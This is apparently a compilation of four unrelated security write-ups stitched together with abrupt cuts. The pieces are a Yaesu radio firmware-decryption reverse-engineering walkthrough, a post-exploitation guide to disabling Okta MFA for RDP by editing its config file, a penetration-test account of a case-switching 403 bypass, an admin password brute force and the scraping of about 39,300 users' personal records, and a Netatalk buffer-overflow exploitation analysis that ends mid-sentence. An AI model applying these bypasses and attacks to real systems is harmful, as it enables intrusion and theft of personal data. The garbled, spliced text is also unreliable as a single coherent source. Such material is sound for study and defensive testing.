This article dives into my full methodology for reverse engineering the tool mentioned in this article. It’s a bit longer but is intended to be accessible to folks who aren’t necessarily advanced reverse-engineers.
Background
Ham radios are a fun way of learning how the radio spectrum works, and more importantly: they’re embedded devices that may run weird chips/firmware! I got curious how easy it’d be to hack my Yaesu FT-70D, so I started doing some research. The only existing resource I could find for Yaesu radios was someone who posted about custom firmware for their Yaesu FT1DR.
The Reddit poster mentioned that if you go through the firmware update process via USB, the radio exposes its Renesas H8SX microcontroller and can have its flash modified using the Renesas SDK. This was a great start and looked promising, but the SDK wasn’t trivial to configure and I wasn’t sure if it could even dump the firmware… so I didn’t use it for very long.
Other Avenues
Yaesu provides a Windows application on their website that can be used to update a radio’s firmware over USB:
The zip contains the following files:
1.2 MB Wed Nov 8 14:34:38 2017 FT-70D_ver111(USA).exe
682 KB Tue Nov 14 00:00:00 2017 FT-70DR_DE_Firmware_Update_Information_ENG_1711-B.pdf
8 MB Mon Apr 23 00:00:00 2018 FT-70DR_DE_MAIN_Firmware_Ver_Up_Manual_ENG_1804-B.pdf
3.2 MB Fri Jan 6 17:54:44 2012 HMSEUSBDRIVER.exe
160 KB Sat Sep 17 15:14:16 2011 RComms.dll
61 KB Tue Oct 23 17:02:08 2012 RFP_USB_VB.dll
1.7 MB Fri Mar 29 11:54:02 2013 vcredist_x86.exe
I’m going to assume that the file specific to the FT-70D, «FT-70D_ver111(USA).exe», will likely contain our firmware image. A PE file (.exe) can contain binary resources in the
.rsrc
section — let’s see what this file contains using XPEViewer:
Resources fit into one of many different resource types, but a firmware image would likely be put into a custom type. What’s this last entry, «23»? Expanding that node we have a couple of interesting items:
RES_START_DIALOG
is a custom string the updater shows when preparing an update, so we’re in the right area!
RES_UPDATE_INFO
looks like just binary data — perhaps this is our firmware image? Unfortunately looking at the «Strings» tab in XPEViewer or running the
strings
utility over this data doesn’t yield anything legible. The firmware image is likely encrypted.
Reverse Engineering the Binary
Let’s load the update utility into our disassembler of choice to figure out how the data is encrypted. I’ll be using IDA Pro, but Ghidra (free!), radare2 (free!), or Binary Ninja are all great alternatives. Where possible in this article I’ll try to show my rewritten code in C since it’ll be a closer match to the decompiler and machine code output.
A good starting point is the the string we saw above,
RES_UPDATE_INFO
. Windows applications load resources by calling one of the
, a handle to the module to look for the resource in.
lpName
, the resource name.
lpType
, the resource type.
In our disassembler we can find references to the
RES_UPDATE_INFO
string and look for calls to
FindResourceA
with this string as an argument in the
lpName
position.
We find a match in a function which happens to find/load all of these custom resources under type
23
.
We know where the data is loaded by the application, so now we need to see how it’s used. Doing static analysis from this point may be more work than it’s worth if the data isn’t operated on immediately. To speed things up I’m going to use a debugger’s assistance. I used WinDbg’s Time Travel Debugging to record an execution trace of the updater while it updates my radio. TTD is an invaluable tool and I’d highly recommend using it when possible. rr is an alternative for non-Windows platforms.
The decompiler output shows this function copies the
RES_UPDATE_INFO
resource to a dynamically allocated buffer. The
qmemcpy()
is inlined and represented by a
rep movsd
instruction in the disassembly, so we need to break at this instruction and examine the
edi
register’s (destination address) value. I set a breakpoint by typing
bp 0x406968
in the command window, allow the application to continue running, and when it breaks we can see the
edi
register value is
0x2be5020
. We can now set a memory access breakpoint at this address using
ba r4 0x2be5020
to break whenever this data is read.
Our breakpoint is hit at
0x4047DC
— back to the disassembler. In IDA you can press
G
and enter this address to jump to it. We’re finally at what looks like the data processing function:
We broke when dereferencing
v2
and IDA has automatically named the variable it’s being assigned to as
Time
. The
Time
variable is passed to another function which formats it as a string with
%Y%m%d%H%M%S
. Let’s clean up the variables to reflect what we know:
010 Editor has a built-in strings utility (Search > Find Strings…) and if we scroll down a bit in the results, we have real strings that appear in my radio!
At this point if we were just interested in getting the plaintext firmware we could stop messing with the binary and load the firmware into IDA Pro… but I want to know how this encryption works.
Encryption Details
Just to recap from the last section:
We’ve identified our data processing routine (let’s call this function
decrypt_update_info
).
We know that the first 4 bytes of the update data are a Unix timestamp that’s formatted as a string and used for an unknown purpose.
We know which function begins decrypting our firmware image.
Data Decryption
Let’s look at the firmware image decryption routine with some renamed variables:
int __thiscall decrypt_data(
void *this,
char *encrypted_data,
int encrypted_data_len,
char *output_data,
int output_data_len,
_DWORD *bytes_written)
{
int data_len; // edx
int output_index; // ebp
int block_size; // esi
unsigned int i; // ecx
char encrypted_byte; // al
char *idata; // eax
int remaining_data; // [esp+10h] [ebp-54h]
char inflated_data[64]; // [esp+20h] [ebp-44h] BYREF
data_len = encrypted_data_len;
output_index = 0;
memset(inflated_data, 0, sizeof(inflated_data));
if ( encrypted_data_len <= 0 )
{
LABEL_13:
*bytes_written = output_index;
return 0;
}
else
{
while ( 1 )
{
block_size = data_len;
if ( data_len >= 8 )
block_size = 8;
remaining_data = data_len - block_size;
// inflate 1 byte of input data to 8 bytes of its bit representation
for ( i = 0; i < 0x40; i += 8 )
{
encrypted_byte = *encrypted_data;
inflated_data[i] = (unsigned __int8)*encrypted_data >> 7;
inflated_data[i + 1] = (encrypted_byte & 0x40) != 0;
inflated_data[i + 2] = (encrypted_byte & 0x20) != 0;
inflated_data[i + 3] = (encrypted_byte & 0x10) != 0;
inflated_data[i + 4] = (encrypted_byte & 8) != 0;
inflated_data[i + 5] = (encrypted_byte & 4) != 0;
inflated_data[i + 6] = (encrypted_byte & 2) != 0;
inflated_data[i + 7] = encrypted_byte & 1;
++encrypted_data;
}
// do something with the inflated data
sub_407980(this, inflated_data, 0);
if ( block_size )
break;
LABEL_12:
if ( remaining_data <= 0 )
goto LABEL_13;
data_len = remaining_data;
}
// deflate the data back to bytes
idata = &inflated_data[1];
while ( 1 )
{
--block_size;
if ( output_index >= output_data_len )
return -101;
output_data[output_index++] = idata[6] | (2
* (idata[5] | (2
* (idata[4] | (2
* (idata[3] | (2
* (idata[2] | (2
* (idata[1] | (2 * (*idata | (2 * *(idata - 1))))))))))))));
idata += 8;
if ( !block_size )
goto LABEL_12;
}
}
}
At a high level this routine:
Allocates a 64-byte scratch buffer
Checks if there’s any data to process. If not, set the output variable
out_data_processed
to the number of bytes processed and return 0x0 (
STATUS_SUCCESS
)
Loop over the input data in 8-byte chunks and inflate each byte to its bit representation.
After the 8-byte chunk is inflated, call
sub_407980
with the scratch buffer and
0
as arguments.
Loop over the scratch buffer and reassemble 8 sequential bits as 1 byte, then set the byte at the appropriate index in the output buffer.
Lots going on here, but let’s take a look at step #3. If we take the bytes
0xAA
and
0x77
which have bit representations of
0b1010_1010
and
0b0111_1111
respectively and inflate them to a 16-byte array using the algorithm above, we end up with:
Oof. This is substantially more complicated but looks like the meat of the decryption algorithm. We’ll refer to this function,
sub_407980
, as
decrypt_data
from here on out. We can see what may be an immediate roadblock: this function takes in a C++
this
pointer (line 5) and performs bitwise operations on one of its members (line 18, 23, etc.). For now let’s call this class member
key
and come back to it later.
This function is the perfect example of decompilers emitting less than ideal code as a result of compiler optimizations/code reordering. For me, TTD was essential for following how data flows through this function. It took a few hours of banging my head against IDA and WinDbg to understand, but this function can be broken up into 3 high-level phases:
Building a 48-byte buffer containing our key material XOR’d with data from a static table.
int v33;
unsigned __int8 v34; // [esp+44h] [ebp-34h]
unsigned __int8 v35; // [esp+45h] [ebp-33h]
unsigned __int8 v36; // [esp+46h] [ebp-32h]
unsigned __int8 v37; // [esp+47h] [ebp-31h]
char v38[44]; // [esp+48h] [ebp-30h]
v3 = (int)this;
v4 = 15;
v5 = a3;
v32[0] = (int)this;
v28 = 0;
v31 = 15;
do
{
// The end statement of this loop is strange -- it's writing a byte somewhere? come back
// to this later
for ( i = 0; i < 48; *((_BYTE *)&v33 + i + 3) = v18 )
{
// v28 Starts at 0 but is incremented by 1 during each iteration of the outer `while` loop
v7 = v28;
// v5 is our last argument which was 0
if ( !v5 )
// overwrite v7 with v4, which begins at 15 but is decremented by 1 during each iteration
// of the outer `while` loop
v7 = v4;
// left-hand side of the xor, *(_BYTE *)(i + 48 * v7 + v3 + 4)
// v3 in this context is our `this` pointer + 4, giving us *(_BYTE *)(i + (48 * v7) + this->maybe_key)
// so the left-hand side of the xor is likely indexing into our key material:
// this->maybe_key[i + 48 * loop_multiplier]
//
// right-hand side of the xor, a2[(unsigned __int8)byte_424E50[i] + 31]
// a2 is our input encrypted data, and byte_424E50 is some static data
//
// this full statement can be rewritten as:
// v8 = this->maybe_key[i + 48 * loop_multiplier] ^ encrypted_data[byte_424E50[i] + 31]
v8 = *(_BYTE *)(i + 48 * v7 + v3 + 4) ^ a2[(unsigned __int8)byte_424E50[i] + 31];
v9 = v28;
// write the result of `key_data ^ input_data` to a scratch buffer (v34)
// v34 looks to be declared as the wrong type. v33 is actually a 52-byte buffer
*(&v34 + i) = v8;
// repeat the above 5 more times
if ( !v5 )
v9 = v4;
v10 = *(_BYTE *)(i + 48 * v9 + v3 + 5) ^ a2[(unsigned __int8)byte_424E51[i] + 31];
v11 = v28;
*(&v35 + i) = v10;
// snip
// v18 gets written to the scratch buffer at the end of the loop...
v18 = *(_BYTE *)(i + 48 * v17 + v3 + 9) ^ a2[(unsigned __int8)byte_424E55[i] + 31];
// this was probably the *real* last statement of the for-loop
// i.e. for (int i = 0; i < 48; i += 6)
i += 6;
}
Build a 32-byte buffer containing data from an 0x800-byte static table, with indexes into this table originating from indices built from the buffer in step #1. Combine this 32-byte buffer with the 48-byte buffer in step #1.
// dword_424E80 -- some static data
// (unsigned __int8)v38[0] + 2) -- the original decompiler output has this wrong.
// v33 should be a 52-byte buffer which consumes v38, so v38 is actually data set up in
// the loop above.
// (32 * v34 + 2) -- v34 should be some data from the above loop as well. This looks like
// a binary shift optimization
// repeat with different multipliers...
//
// This can be simplified as:
// size_t index = ((v34 << 5) + 2)
// | ((v37[1] << 4) + 2)
// | ((v35 << 3) + 2)
// | ((v36 << 2) + 2)
// | ((v37 << 1) + 2)
// | v38[0]
// v32[1] = *(int*)(((char*)&dword_424e80)[index])
v32[1] = *(int *)((char *)&dword_424E80
+ (((unsigned __int8)v38[0] + 2) | (32 * v34 + 2) | (16 * (unsigned __int8)v38[1] + 2) | (8 * v35 + 2) | (4 * v36 + 2) | (2 * v37 + 2)));
// repeat 7 times. each time the reference to dword_424e80 is shifted forward by 0x100.
// note: if you do the math, the next line uses dword_424e80[64]. We shift by 0x100 instead of
// 64 because is misleading because dword_424e80 is declared as an int array -- not a char array.
Iterate over the next 8 bytes of the output buffer. For each byte index of the output buffer, index into yet another static 32-byte buffer and use that as the index into the table from step #2. XOR this value with the value at the current index of the output buffer.
// Not really sure why this calculation works like this. It ends up just being `unk_425681`'s address
// when it's used.
v19 = (char *)(&unk_425681 - (_UNKNOWN *)a2);
v20 = &unk_425680 - (_UNKNOWN *)a2;
// v4 is a number that's decremented on every iteration -- possibly bytes remaining?
if ( v4 <= 0 )
{
// Loop over 8 bytes
v30 = 8;
do
{
// Start XORing the output bytes with some of the data generated in step 2.
//
// Cheating here and doing the "draw the rest of the owl", but if you observe that
// we use `unk_425680` (v20), `unk_425681` (v19), `unk_425682`, and byte_425683, the
// the decompiler generated suboptimal code. We can simplify to be relative to just
// `unk_425680`
//
// *result ^= step2_bytes[unk_425680[output_index] - 1]
*result ^= *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
// result[1] ^= step2_bytes[unk_425680[output_index] + 1]
result[1] ^= *((_BYTE *)v32 + (unsigned __int8)v19[(_DWORD)result] + 3);
// result[2] ^= step2_bytes[unk_425680[output_index] + 2]
result[2] ^= *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2] + 3);
// result[3] ^= step2_bytes[unk_425680[output_index] + 3]
result[3] ^= *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2] + 3);
// Move our our pointer to the output buffer forward by 4 bytes
result += 4;
--v30;
}
while ( v30 );
}
else
{
// loop over 8 bytes
v29 = 8;
do
{
// grab the byte at 0x20, we're swapping this later
v24 = result[32];
// v22 = *result ^ step2_bytes[unk_425680[output_index] - 1]
v22 = *result ^ *((_BYTE *)v32 + (unsigned __int8)result[v20] + 3);
// I'm not sure why the output buffer pointer is incremented here, but
// this really makes the code ugly
result += 4;
// Write the byte generated above to offset 0x1c
result[28] = v22;
// Write the byte at 0x20 to offset 0
*(result - 4) = v24;
// rinse, repeat with slightly different offsets each time...
v25 = result[29];
result[29] = *(result - 3) ^ *((_BYTE *)v32 + (unsigned __int8)result[(_DWORD)v19 - 4] + 3);
*(result - 3) = v25;
v26 = result[30];
result[30] = *(result - 2) ^ *((_BYTE *)v32 + (unsigned __int8)result[&unk_425682 - (_UNKNOWN *)a2 - 4] + 3);
*(result - 2) = v26;
v27 = result[31];
result[31] = *(result - 1) ^ *((_BYTE *)v32 + (unsigned __int8)result[byte_425683 - a2 - 4] + 3);
*(result - 1) = v27;
--v29;
}
while ( v29 );
}
The inner loop in the
else
branch above I think is kind of nasty, so here it is reimplemented in Rust:
for _ in 0..8 {
// we swap the `first` index with the `second`
for (first, second) in (0x1c..=0x1f).zip(0..4) {
let original_byte_idx = first + output_offset + 4;
let original_byte = outbuf[original_byte_idx];
let constant = unk_425680[output_offset + second] as usize;
let new_byte = outbuf[output_offset + second] ^ generated_bytes_from_step2[constant - 1];
let new_idx = original_byte_idx;
outbuf[new_idx] = new_byte;
outbuf[output_offset + second] = original_byte;
}
output_offset += 4;
}
Key Setup
We now need to figure out how our key is set up for usage in the
decrypt_data
function above. My approach here is to set a breakpoint at the first instruction to use the key data in
decrypt_data
, which happens to be
xor bl, [ecx + esi + 4]
at
0x4079d3
. I know this is where we should break because in the decompiler output the left-hand side of the XOR operation, the key material, will be the second operand in the
xor
instruction. As a reminder, the decompiler shows the XOR as:
The breakpoint is hit and the address we’re loading from is
0x19f5c4
. We can now lean on TTD to help us figure out where this data was last written. Set a 1-byte memory write breakpoint at this address using
ba w1 0x19f5c4
and press the
Go Back
button. If you’ve never used TTD before, this operates exactly as
Go
would except backwards in the program’s trace. In this case it will execute backward until either a breakpoint is hit, interrupt is generated, or we reach the start of the program.
Our memory write breakpoint gets triggered at
0x4078fb
— a function we haven’t seen before. The callstack shows that it’s called not terribly far from the
decrypt_update_info
routine!
set_key
(we are here — function is originally called
sub_407850
)
sub_4082c0
decrypt_update_info
What’s
sub_4082c0
?
Not a lot to see here except the same function called 4 times, initially with the timestamp string as an argument in position 0, a 64-byte buffer, and bunch of function calls using the return value of the last as its input. The function our debugger just broke into takes only 1 argument, which is the 64-byte buffer used across all of these function calls. So what’s going on in
sub_407e80
?
The bitwise operations that look supsiciously similar to the byte to bit inflation we saw above with the firmware data. After renaming things and performing some loop unrolling, things look like this:
The first 4 bytes of the update data are a Unix timestamp
The timestamp is formatted as a string, has each byte inflated to its bit representation, and decrypted using some static key material as the key. This is repeated 4 times with the output of the previous run used as an input to the next.
The resulting data from step 3 is used as a key for decrypting data.
The remainder of the firmware update image is inflated to its bit representation 8 bytes at a time and uses the dynamic key and 3 other unique static lookup tables to transform the inflated input data.
The result from step 5 is deflated back into its byte representation.
IDA thankfully supports disassembling the Hitachi/Rensas H8SX architecture. If we load our firmware into IDA and select the «Hitachi H8SX advanced» processsor type, use the default options for the «Disassembly memory organization» dialog, then finally choose «H8S/2215R» in the «Choose the device name» dialog…:
We don’t have shit. I’m not an embedded systems expert, but my friend suggested that the first few DWORDs look like they may belong to a vector table. If we right-click address 0 and select «Double word 0x142A», we can click on the new variable
I’ll state this upfront, so as not to confuse: This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA.
Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop Protocol (RDP) clients. Using Okta MFA Credential Provider for Windows, RDP clients (Windows workstations and servers) are prompted for MFA when accessing supported domain joined Windows machines and servers.
This is going to be very similar to my other post about Bypassing Duo Two-Factor Authentication. I’d recommend reading that first to provide context to this post.
Biggest difference between Duo and Okta is that Okta does not have fail open as the default value, making it less likely of a configuration. It also does not have “RDP Only” as the default, making the console bypass also less likely to be successful.
With that said, if you do have administrator level shell access, it is quite simple to disable.
For Okta, the configuration file is not stored in the registry like Duo but in a configuration file located at:
C:\Program Files\Okta\Okta Windows Credential Provider\config\rdp_app_config.json
There are two things you need to do:
Modify the InternetFailOpenOption value to true
Change the Url value to something that will not resolve.
After that, attempts to RDP will not prompt Okta MFA.
It is of course always possible to uninstall the software as an admin, but ideally we want to achieve our objective with the least intrusive means possible. These configuration files can easily be flipped back when you are done.
Today we’ll look at one of the external penetration tests that I carried out earlier this year. Due to the confidentiality agreement, we will use the usual domain of REDACTED.COM
So, to provide a bit of context to the test, it is completely black box with zero information being provided from the customer. The only thing we know is that we are allowed to test redacted.com and the subdomain my.redacted.com
I’ll skip through the whole passive information gathering process and will get straight to the point.
I start actively scanning and navigating through the website to discover potential entry points. There are no ports open other than 80 & 443.
So, I start directory bruteforcing with gobuster and straightaway, I see an admin panel that returns a 403 — Forbidden response.
gobuster
Seeing this, we navigate to the website to verify that it is indeed a 403 and to capture the request with Burp Suite for potential bypasses.
admin panel — 403
In my mind, I am thinking that it will be impossible to bypass this, because there is an ACL for internal IP addresses. Nevertheless, I tried the following to bypass the 403:
HTTP Methods fuzzing (GET, POST, TRACE, HEAD etc.)
Path fuzzing/force browsing (https://redacted.com/admin/index.html, https://redacted.com/admin/./index.html and more)
Protocol version changing (From HTTP 1.2, downgrade to HTTP 1.1 etc.)
String terminators (%00, 0x00, //, ;, %, !, ?, [] etc.) — adding those to the end of the path and inside the path
Long story short, none of those methods worked. So, I remember that sometimes the security controls are built around the literal spelling and case of components within a request. Therefore, I tried the ‘Case Switching’ technique — probably sounds dumb, but it actually worked!
To sum it up:
https://redacted.com/admin -> 403 Forbidden
https://redacted.com/Admin -> 200 OK
https://redacted.com/aDmin -> 200 OK
Swiching any of the letters to a capital one, will bypass the restriction.
Voila! We get a login page to the admin panel.
admin panel — bypassed 403
We get lucky with this one, nevertheless, we are now able to try different attacks (password spraying, brute forcing etc.). The company that we are testing isn’t small and we had collected quite a large number of employee credentials from leaked databases (leak check, leak peek and others). However, this is the admin panel and therefore we go with the usual tests:
See if there is username enumeration
See if there are any login restrictions
Check for possible WAF that will block us due to number of requests
To keep it short, there is neither. We are unable to enumerate usernames, however there is no rate limiting of any sort.
Considering the above, we load rockyou.txt and start brute forcing the password of the ‘admin’ account. After a few thousand attempts, we see the below:
admin panel brute forcing w/ Burp Suite
We found valid credentials for the admin account. Navigate to the website’s admin panel, authenticate and we are in!
Admin panel — successful authentication
Now that we are in, there isn’t much more that we need to do or can do (without the consent of the customer). The admin panel with administrative privileges allows you to change the whole configuration — control the users & their attributes, control the website’s pages, control everything really. So, I decided to write a Python script that scrapes the whole database of users (around 39,300 — thirty nine thousand and three hundred) that contains their names, emails, phones & addresses. The idea to collect all those details is to then present them to the client (victim) — to show the seriousness of the exploited vulnerabilities. Also, due to the severity of those security weaknesses, we wrote a report the same day for those specific issues, which were fixed within 24 hours.
Ultimately, there wasn’t anything too difficult in the whole exploitation process, however the unusual 403 bypass is really something that I see for the first time and I thought that some of you might weaponize this or add it to your future 403 bypass checklists.
The Western Digital MyCloudHome is a consumer grade NAS with local network and cloud based functionalities. At the time of the contest (firmware 7.15.1-101) the device ran a custom Android distribution on a armv8l CPU. It exposed a few custom services and integrated some open source ones such as the Netatalk daemon. This service was a prime target to compromise the device because it was running with root privileges and it was reachable from adjacent network. We will not discuss the initial surface discovery here to focus more on the vulnerability. Instead we provide a detailed analysis of the vulnerabilty and how we exploited it.
Netatalk [2] is a free and Open Source [3] implementation of the Apple Filing Protocol (AFP) file server. This protocol is used in networked macOS environments to share files between devices. Netatalk is distributed via the service afpd, also available on many Linux distributions and devices. So the work presented in this article should also apply to other systems. Western Digital modified the sources a bit to accommodate the Android environment [4], but their changes are not relevant for this article so we will refer to the official sources.
AFP data is carried over the Data Stream Interface (DSI) protocol [5]. The exploited vulnerability lies in the DSI layer, which is reachable without any form of authentication.
OVERVIEW OF SERVER IMPLEMENTATION
The DSI layer
The server is implemented as an usual fork server with a parent process listening on the TCP port 548 and forking into new children to handle client sessions. The protocol exchanges different packets encapsulated by Data Stream Interface (DSI) headers of 16 bytes.
#define DSI_BLOCKSIZ 16
struct dsi_block {
uint8_t dsi_flags; /* packet type: request or reply */
uint8_t dsi_command; /* command */
uint16_t dsi_requestID; /* request ID */
union {
uint32_t dsi_code; /* error code */
uint32_t dsi_doff; /* data offset */
} dsi_data;
uint32_t dsi_len; /* total data length */
uint32_t dsi_reserved; /* reserved field */
};
A request is usually followed by a payload which length is specified by the
dsi_len
field.
The meaning of the payload depends on what
dsi_command
is used. A session should start with the
dsi_command
byte set as
DSIOpenSession (4)
. This is usually followed up by various
DSICommand (2)
to access more functionalities of the file share. In that case the first byte of the payload is an AFP command number specifying the requested operation.
dsi_requestID
is an id that should be unique for each request, giving the chance for the server to detect duplicated commands. As we will see later, Netatalk implements a replay cache based on this id to avoid executing a command twice.
It is also worth mentioning that the AFP protocol supports different schemes of authentication as well as anonymous connections. But this is out of the scope of this write-up as the vulnerability is located in the DSI layer, before AFP authentication.
Few notes about the server implementation
The DSI struct
To manage a client in a child process, the daemon uses a
DSI *dsi
struct. This represents the current connection, with its buffers and it is passed into most of the Netatalk functions. Here is the struct definition with some members edited out for the sake of clarity:
#define DSI_DATASIZ 65536
/* child and parent processes might interpret a couple of these
* differently. */
typedef struct DSI {
/* ... */
struct dsi_block header;
/* ... */
uint8_t *commands; /* DSI receive buffer */
uint8_t data[DSI_DATASIZ]; /* DSI reply buffer */
size_t datalen, cmdlen;
off_t read_count, write_count;
uint32_t flags; /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
int socket; /* AFP session socket */
int serversock; /* listening socket */
/* DSI readahead buffer used for buffered reads in dsi_peek */
size_t dsireadbuf; /* size of the DSI read ahead buffer used in dsi_peek() */
char *buffer; /* buffer start */
char *start; /* current buffer head */
char *eof; /* end of currently used buffer */
char *end;
/* ... */
} DSI;
We mainly see that the struct has:
The
command
heap buffer used for receiving the user input, initialized in
dsi_init_buffer()
with a default size of 1MB ;
cmdlen
to specify the size of the input in
command
;
An inlined
data
buffer of 64KB used for the reply ;
datalen
to specify the size of the output in
data
;
A read ahead heap buffer managed by the pointers
buffer
,
start
,
eof
,
end
, with a default size of 12MB also initialized in
dsi_init_buffer()
.
The main loop flow
After receiving
DSIOpenSession
command, the child process enters the main loop in
afp_over_dsi()
. This function dispatches incoming commands until the end of the communication. Its simplified code is the following:
void afp_over_dsi(AFPObj *obj)
{
DSI *dsi = (DSI *) obj->dsi;
/* ... */
/* get stuck here until the end */
while (1) {
/* ... */
/* Blocking read on the network socket */
cmd = dsi_stream_receive(dsi);
/* ... */
switch(cmd) {
case DSIFUNC_CLOSE:
/* ... */
case DSIFUNC_TICKLE:
/* ...*/
case DSIFUNC_CMD:
/* ... */
function = (u_char) dsi->commands[0];
/* ... */
err = (*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, &dsi->data, &dsi->datalen);
/* ... */
default:
LOG(log_info, logtype_afpd,"afp_dsi: spurious command %d", cmd);
dsi_writeinit(dsi, dsi->data, DSI_DATASIZ);
dsi_writeflush(dsi);
break;
}
The receiving process
In the previous snippet, we saw that an idling server will receive the client data in
dsi_stream_receive()
. Because of the buffering attempts this function is a bit cumbersome. Here is an overview of the whole receiving process within
dsi_stream_receive()
.
dsi_stream_receive(DSI* dsi)
1. define char block[DSI_BLOCKSIZ] in its stack to receive a DSI header
2. dsi_buffered_stream_read(dsi, block, sizeof(block)) wait for a DSI header
1. from_buf(dsi, block, length)
Tries to fetch available data from already buffered input
in-between dsi->start and dsi->end
2. recv(dsi->socket, dsi->eof, buflen, 0)
Tries to receive at most 8192 bytes in a buffering attempt into the look ahead buffer
The socket is non blocking so the call usually fails
3. dsi_stream_read(dsi, block, len))
1. buf_read(dsi, block, len)
1. from_buf(dsi, block, len)
Tries again to get data from the buffered input
2. readt(dsi->socket, block, len, 0, 0);
Receive data on the socket
This call will wait on a recv()/select() loop and is usually the blocking one
3. Populate &dsi->header from what has been received
4. dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
1. calls buf_read() to fetch the DSI payload
If not enough data is available, the call wait on select()
The main point to notice here is that the server is only buffering the client data in the
recv()
of
dsi_buffered_stream_read()
when multiple or large commands are sent as one. Also, never more than 8KB are buffered.
THE VULNERABILITY
As seen in the previous snippets, in the main loop,
afp_over_dsi()
can receive an unknown command id. In that case the server will call
dsi_writeinit(dsi, dsi->data, DSI_DATASIZ)
then
dsi_writeflush(dsi)
.
We assume that the purpose of those two functions is to flush both the input and the output buffer, eventually purging the look ahead buffer. However these functions are really peculiar and calling them here doesn’t seem correct. Worst,
dsi_writeinit()
has a buffer overflow vulnerability! Indeed the function will flush out bytes from the look ahead buffer into its second argument
dsi->data
without checking the size provided into the third argument
DSI_DATASIZ
.
size_t dsi_writeinit(DSI *dsi, void *buf, const size_t buflen _U_)
{
size_t bytes = 0;
dsi->datasize = ntohl(dsi->header.dsi_len) - dsi->header.dsi_data.dsi_doff;
if (dsi->eof > dsi->start) {
/* We have data in the buffer */
bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
memmove(buf, dsi->start, bytes); // potential overflow here
dsi->start += bytes;
dsi->datasize -= bytes;
if (dsi->start >= dsi->eof)
dsi->start = dsi->eof = dsi->buffer;
}
LOG(log_maxdebug, logtype_dsi, "dsi_writeinit: remaining DSI datasize: %jd", (intmax_t)dsi->datasize);
return bytes;
}
). This may lead to a corruption of the tail of the
dsi
struct as
dsi->data
is an inlined buffer.
However there is an important limitation:
dsi->data
has a size of 64KB and we have seen that the implementation of the look ahead buffer will at most read 8KB of data in
dsi_buffered_stream_read()
. So in most cases
dsi->eof - dsi->start
is less than 8KB and that is not enough to overflow
dsi->data
.
Fortunately, there is still a complex way to buffer more than 8KB of data and to trigger this overflow. The next parts explain how to reach that point and exploit this vulnerability to achieve code execution.
Exploitation
TRIGGERING THE VULNERABILITY
Finding a way to push data in the look ahead buffer
The curious case of dsi_peek()
While the receiving process is not straightforward, the sending one is even more confusing. There are a lot of different functions involved to send back data to the client and an interesting one is
dsi_peek(DSI *dsi)
.
Here is the function documentation:
/*
* afpd is sleeping too much while trying to send something.
* May be there's no reader or the reader is also sleeping in write,
* look if there's some data for us to read, hopefully it will wake up
* the reader so we can write again.
*
* @returns 0 when is possible to send again, -1 on error
*/
static int dsi_peek(DSI *dsi)
In other words,
dsi_peek()
will take a pause during a blocked send and might try to read something if possible. This is done in an attempt to avoid potential deadlocks between the client and the server. The good thing is that the reception is buffered:
static int dsi_peek(DSI *dsi)
{
/* ... */
while (1) {
/* ... */
FD_ZERO(&readfds);
FD_ZERO(&writefds);
if (dsi->eof < dsi->end) {
/* space in read buffer */
FD_SET( dsi->socket, &readfds);
} else { /* ... */ }
FD_SET( dsi->socket, &writefds);
/* No timeout: if there's nothing to read nor nothing to write,
* we've got nothing to do at all */
if ((ret = select( maxfd, &readfds, &writefds, NULL, NULL)) <= 0) {
if (ret == -1 && errno == EINTR)
/* we might have been interrupted by out timer, so restart select */
continue;
/* give up */
LOG(log_error, logtype_dsi, "dsi_peek: unexpected select return: %d %s",
ret, ret < 0 ? strerror(errno) : "");
return -1;
}
if (FD_ISSET(dsi->socket, &writefds)) {
/* we can write again */
LOG(log_debug, logtype_dsi, "dsi_peek: can write again");
break;
}
/* Check if there's sth to read, hopefully reading that will unblock the client */
if (FD_ISSET(dsi->socket, &readfds)) {
len = dsi->end - dsi->eof; /* it's ensured above that there's space */
if ((len = recv(dsi->socket, dsi->eof, len, 0)) <= 0) {
if (len == 0) {
LOG(log_error, logtype_dsi, "dsi_peek: EOF");
return -1;
}
LOG(log_error, logtype_dsi, "dsi_peek: read: %s", strerror(errno));
if (errno == EAGAIN)
continue;
return -1;
}
LOG(log_debug, logtype_dsi, "dsi_peek: read %d bytes", len);
dsi->eof += len;
}
}
Here we see that if the
select()
returns with
dsi->socket
set as readable and not writable,
recv()
is called with
dsi->eof
. This looks like a way to push more than 64KB of data into the look ahead buffer to later trigger the vulnerability.
One question remains: how to reach dsi_peek()?
Reaching dsi_peek()
While there are multiple ways to get into that function, we focused on the
dsi_cmdreply()
call path. This function is used to reply to a client request, which is done with most AFP commands. For instance sending a request with
DSIFUNC_CMD
and the AFP command
0x14
will trigger a logout attempt, even for an un-authenticated client and reach the following call stack:
ssize_t dsi_stream_write(DSI *dsi, void *data, const size_t length, int mode)
{
/* ... */
while (written < length) {
len = send(dsi->socket, (uint8_t *) data + written, length - written, flags);
if (len >= 0) {
written += len;
continue;
}
if (errno == EINTR)
continue;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
LOG(log_debug, logtype_dsi, "dsi_stream_write: send: %s", strerror(errno));
if (mode == DSI_NOWAIT && written == 0) {
/* DSI_NOWAIT is used by attention give up in this case. */
written = -1;
goto exit;
}
/* Try to read sth. in order to break up possible deadlock */
if (dsi_peek(dsi) != 0) {
written = -1;
goto exit;
}
/* Now try writing again */
continue;
}
/* ... */
In the above code, we see that in order to reach
dsi_peek()
the call to
send()
has to fail.
Summarizing the objectives and the strategy
So to summarize, in order to push data into the look ahead buffer one can:
Send a logout command to reach
dsi_cmdreply
.
In
dsi_stream_write
, find a way to make the
send()
syscall fail.
In
dsi_peek()
find a way to make
select()
only returns a readable socket.
Getting a remote system to fail at sending data, while maintaining the stream open is tricky. One funny way to do that is to mess up with the TCP networking layer. The overall strategy is to have a custom TCP stack that will simulate a network congestion once a logout request is sent, but only in one direction. The idea is that the remote application will think that it can not send any more data, while it can still receive some.
Because there are a lot of layers involved (the networking card layer, the kernel buffering, the remote TCP congestion avoidance algorithm, the userland stack (?)) it is non trivial to find the optimal way to achieve the goals. But the chosen approach is a mix between two techniques:
